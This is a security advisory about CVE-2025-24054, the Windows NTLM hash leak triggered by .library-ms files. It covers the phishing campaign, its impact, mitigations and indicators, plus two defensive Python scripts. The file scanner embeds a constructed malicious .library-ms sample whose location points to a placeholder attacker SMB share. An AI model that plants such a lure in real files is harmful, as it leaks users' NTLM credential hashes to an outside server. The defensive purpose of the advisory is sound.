CVE-2025-24054, NTLM Exploit in the Wild
CVE-2025-24054 is a Windows NTLM hash-disclosure spoofing vulnerability that Microsoft patched in its March 2025 security update and that has been exploited in the wild since March 2025. Attackers deliver malicious .library-ms files that make Windows Explorer authenticate over SMB to an attacker-controlled server, leaking the user's NTLMv2 challenge-response hash with minimal user interaction, such as right-clicking the file or browsing to the folder that contains it. The leaked hash is not a plaintext password, but it can be cracked offline or relayed in real time to other services. The campaign primarily targets government and private institutions in Poland and Romania via malspam emails containing Dropbox links. The vulnerability is a variant of the previously patched CVE-2024-43451, and many environments had not applied the March 2025 update when exploitation began. Compromised credentials enable lateral movement, privilege escalation and full system compromise. European organizations relying on NTLM and lacking advanced endpoint protections are at high risk. Mitigations include applying the March 2025 update, blocking outbound SMB at the network edge, restricting outgoing NTLM, blocking .library-ms files at the mail gateway, deploying EDR and disabling NTLM where feasible. Countries most affected include Poland, Romania, Ukraine, Germany, France, Italy, the UK and Spain due to targeted campaigns and similar IT environments.
AI Analysis
Technical Summary
CVE-2025-24054 is a Windows vulnerability that lets an attacker coerce NTLM authentication from a victim's machine. It has been exploited in the wild since March 2025, within days of Microsoft's March 2025 patch. The attack vector is a maliciously crafted .library-ms file. A .library-ms file is an XML document that describes a Windows Explorer library, and its <simpleLocation><url> element tells the shell where the library's content lives. When that element points to a UNC path on an attacker-controlled server, Explorer connects to it over SMB and authenticates with NTLM, sending the user's NTLMv2 challenge-response hash to the attacker. Right-clicking the file or merely browsing to the folder that contains it is enough; the file is never executed and no elevated privileges are required. The leaked hash is not a plaintext password, but it can be cracked offline if the password is weak, or relayed in real time to services that do not enforce SMB signing or Extended Protection for Authentication.

The vulnerability is a variant of CVE-2024-43451, which Microsoft patched in November 2024. The fix for CVE-2025-24054 shipped in March 2025, but many environments had not applied it when exploitation began. Attackers distribute the payloads primarily through malspam campaigns containing Dropbox links, targeting government and private sector institutions, especially in Poland and Romania. The campaign is attributed to the adversary group UAC-0194.

Once a hash is cracked or relayed, attackers can move laterally within the network, escalate privileges and achieve full system compromise. The threat is significant for European organizations that still rely on NTLM authentication and lack endpoint detection and response (EDR) coverage. Mitigation strategies include applying the March 2025 update, blocking outbound SMB at the network edge, restricting outgoing NTLM traffic, blocking .library-ms files at the mail gateway, deploying EDR to detect suspicious file interactions and lateral movement, and disabling NTLM authentication where possible to eliminate the attack surface.
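The file-format point above can be checked mechanically. The following Python script is an added example, not code from Check Point's report or from the OTX pulse: it parses the XML of a .library-ms file, extracts every <simpleLocation><url> location and flags those that would make Explorer contact a remote host (UNC paths, and http/https locations that Explorer opens through WebDAV, which also authenticates with NTLM). The two embedded library documents are constructed for this example, the 203.0.113.10 address is a documentation-range placeholder, and the hypothetical scan_tree helper assumes you point it at a directory such as a user's Downloads folder.

```python
"""Scan .library-ms documents for remote locations, the lure shape used in the
CVE-2025-24054 campaign.  Added example; not code from the original report."""
from __future__ import annotations

import os
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# XML namespace used by Windows library definition files.
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# A UNC path such as \\host\share makes Explorer open an SMB session to "host".
UNC_RE = re.compile(r"^\\\\[^\\]+")
# Explorer reaches http(s) locations through WebDAV, which also uses NTLM.
REMOTE_SCHEMES = {"http", "https", "webdav", "ftp"}

# Constructed samples for this example.  The benign one mirrors a stock
# Documents library (knownfolder GUID of the Documents folder); the malicious
# one points the library at an SMB share on a TEST-NET placeholder address.
BENIGN_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

MALICIOUS_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.10\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def library_locations(xml_text: str) -> list[str]:
    """Return every <url> found under <simpleLocation> in a library document."""
    root = ET.fromstring(xml_text)
    return [u.text.strip()
            for u in root.iterfind(".//lib:simpleLocation/lib:url", NS)
            if u.text]


def is_remote_location(url: str) -> bool:
    """True if Explorer would contact a remote host to resolve this location."""
    if UNC_RE.match(url):
        return True
    return urlparse(url).scheme.lower() in REMOTE_SCHEMES


def scan_library(xml_text: str) -> list[str]:
    """Remote locations in the document; an empty list means clean.  A file the
    XML parser rejects is reported rather than ignored: the shell may be more
    forgiving than the parser, so treat it as suspicious."""
    try:
        return [u for u in library_locations(xml_text) if is_remote_location(u)]
    except ET.ParseError:
        return ["<malformed XML>"]


def scan_tree(root_dir: str) -> dict[str, list[str]]:
    """Hypothetical helper: walk a directory tree (e.g. a user's Downloads
    folder) and map each flagged .library-ms path to its remote locations."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".library-ms"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8-sig", errors="replace") as fh:
                remote = scan_library(fh.read())
            if remote:
                findings[path] = remote
    return findings


if __name__ == "__main__":
    print("benign   :", scan_library(BENIGN_LIBRARY))
    print("malicious:", scan_library(MALICIOUS_LIBRARY))
```

Run it on a quarantined mail attachment or on the Downloads folders of suspected victims; any .library-ms whose only location is a knownfolder: or local path is a normal library, while a UNC or http location arriving from outside the organization should be treated as a credential-theft lure regardless of whether it matches a known hash.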
Potential Impact
For European organizations the impact of CVE-2025-24054 is substantial. Successful exploitation leaks the user's NTLMv2 challenge-response hash. A weak password can then be recovered by offline cracking, and even without cracking the exchange can be relayed in real time to services that do not require SMB signing or Extended Protection for Authentication, giving the attacker a foothold for lateral movement, privilege escalation and full compromise of affected systems. This threatens the confidentiality, integrity and availability of critical systems and sensitive data. Government institutions and private enterprises in Poland and Romania are the primary targets, but the campaign's reach extends to Ukraine, Germany, France, Italy, the UK and Spain, where similar IT environments and reliance on NTLM exist. Malspam carrying Dropbox links increases the likelihood of initial compromise, especially in organizations with weak email filtering and endpoint protections. Exploitation can disrupt operations, lead to data breaches and facilitate espionage or sabotage, particularly in strategic sectors. Organizations without robust mitigations face an increased risk of persistent attacker presence and significant operational and reputational damage.
Mitigation Recommendations
To mitigate CVE-2025-24054, European organizations should implement the following specific measures:
1) Apply the March 2025 Windows security update that fixes CVE-2025-24054, and confirm the November 2024 fix for CVE-2024-43451 is installed, on every workstation and server. This is the only fix for the root cause; everything below limits the damage where patching lags.
2) Block outbound SMB (TCP 445 and 139) from workstations to the internet at the perimeter firewall and on host firewalls. With no path to the attacker's SMB server the NTLM exchange never happens. Note that Windows falls back to WebDAV over HTTP when SMB fails, so also restrict or disable the WebClient service on hosts that do not need it.
3) Set the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all (use Audit all first to find legitimate dependencies). The underlying registry value is HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\RestrictSendingNTLMTraffic (2 = deny all). This stops the coerced authentication even when the network connection is allowed.
4) Block .library-ms attachments at the mail gateway, including inside ZIP and other archives, and filter malspam links to cloud storage services such as Dropbox. There is no Group Policy that simply turns off .library-ms handling, so keeping the files out is the practical control.
5) Deploy and maintain EDR capable of alerting on explorer.exe initiating outbound SMB or WebDAV connections to external hosts and on the lateral movement that follows a credential leak.
6) Reduce the value of a leaked hash: require SMB signing, LDAP signing and LDAP channel binding, and enable Extended Protection for Authentication so the exchange cannot be relayed; enforce long passwords so NTLMv2 responses resist offline cracking. MFA protects MFA-enabled services against reuse of a cracked password, but it does not stop NTLM relay, so it is not a substitute for the controls above.
7) Where feasible, disable NTLM in favor of Kerberos, or use NTLM auditing to inventory remaining dependencies and then apply NTLM blocking policies.
8) Conduct user awareness training that stresses how little interaction is needed: right-clicking a .library-ms file, or just opening the folder that contains it, is enough.
9) Monitor for outbound SMB connections to external addresses (allowed or denied) and for unusual NTLM authentications, for example Windows security Event ID 4624 with authentication package NTLM from unexpected sources, which indicate either a leak in progress or a lure that the perimeter caught.
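The perimeter-blocking and monitoring recommendations above both come down to spotting workstations that tried to reach an external SMB endpoint. The Python below is an added example and not part of the original advisory: it parses constructed firewall log lines in a hypothetical key=value format, keeps TCP 445/139 connections from internal to external addresses whether they were allowed or denied, and groups them per destination, with "leaked" for allowed connections (assume the NTLMv2 response reached the attacker and treat the source host's logged-on credentials as compromised) and "blocked" for denied ones (the lure fired but the perimeter held). The internal address plan (RFC 1918 plus loopback and link-local) and the log format are assumptions; adapt LINE_RE to your own firewall's export.

```python
"""Flag internal hosts that attempted outbound SMB to external addresses, the
network symptom of an NTLM hash leak such as the CVE-2025-24054 .library-ms
lure.  Added example; the log format and address plan are assumptions."""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict

# Assumed address plan: RFC 1918 plus loopback and link-local count as internal;
# everything else is external.  Replace with your organization's ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}

# Hypothetical key=value firewall export; the lines are constructed for this
# example and the destinations are documentation-range placeholders.
SAMPLE_LOG = """\
2025-03-20T10:15:02Z src=10.0.4.17 dst=10.0.1.5 proto=tcp dport=445 action=allow
2025-03-20T10:15:09Z src=10.0.4.17 dst=203.0.113.10 proto=tcp dport=445 action=allow
2025-03-20T10:15:10Z src=10.0.4.17 dst=203.0.113.10 proto=tcp dport=80 action=allow
2025-03-20T10:16:41Z src=10.0.7.22 dst=203.0.113.10 proto=tcp dport=445 action=deny
2025-03-20T10:17:03Z src=10.0.7.22 dst=198.51.100.7 proto=tcp dport=139 action=allow
2025-03-20T10:17:05Z src=192.168.9.3 dst=10.0.1.5 proto=udp dport=445 action=allow
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>\w+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$")


def is_internal(ip_text: str) -> bool:
    """True if the address falls inside the assumed internal ranges."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> dict | None:
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def smb_egress_events(log_text: str) -> list[tuple[str, str, str, str]]:
    """(timestamp, src, dst, action) for every TCP SMB connection attempt from
    an internal host to an external address.  Denied attempts are kept on
    purpose: they show which hosts opened the lure even if nothing leaked."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"].lower() != "tcp" or rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits.append((rec["ts"], rec["src"], rec["dst"], rec["action"].lower()))
    return hits


def triage(log_text: str) -> dict[str, dict[str, list[str]]]:
    """Group hits per external destination.  'leaked' holds sources whose
    connection was allowed (assume the NTLMv2 response reached the attacker),
    'blocked' holds sources the perimeter stopped."""
    report: dict[str, dict[str, set[str]]] = defaultdict(
        lambda: {"leaked": set(), "blocked": set()})
    for _ts, src, dst, action in smb_egress_events(log_text):
        report[dst]["leaked" if action == "allow" else "blocked"].add(src)
    return {dst: {k: sorted(v) for k, v in buckets.items()}
            for dst, buckets in report.items()}


if __name__ == "__main__":
    for dst, buckets in triage(SAMPLE_LOG).items():
        print(dst, "leaked:", buckets["leaked"], "blocked:", buckets["blocked"])
```

Every source in a "leaked" bucket warrants a password reset for the user logged on at that time and a check of the destination against the campaign's indicators; sources in a "blocked" bucket still have the lure on disk and should be swept with a file scan such as the one above.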
Affected Countries
Poland, Romania, Ukraine, Germany, France, Italy, United Kingdom, Spain
Indicators of Compromise
- cve: CVE-2025-24071
- cve: CVE-2024-43451
- cve: CVE-2025-24054
- hash (SHA-1): 9ca72d969d7c5494a30e996324c6c0fcb72ae1ae
- hash (SHA-1): 84132ae00239e15b50c1a20126000eed29388100
- hash (SHA-1): 76e93c97ffdb5adb509c966bca22e12c4508dcaa
- hash (SHA-1): 7dd0131dd4660be562bc869675772e58a1e3ac8e
- hash (SHA-1): 5e42c6d12f6b51364b6bfb170f4306c5ce608b4f
- hash (SHA-1): 054784f1a398a35e0c5242cbfa164df0c277da73
- hash (SHA-1): 7a43c177a582c777e258246f0ba818f9e73a69ab
Technical Details
- Author: AlienVault
- TLP: white
- References: https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild
- Adversary: UAC-0194
Threat ID: 682c992c7960f6956616a2ab
Added to database: 5/20/2025, 3:01:00 PM
Last enriched: 2/14/2026, 6:40:18 AM
Last updated: 3/24/2026, 7:49:32 PM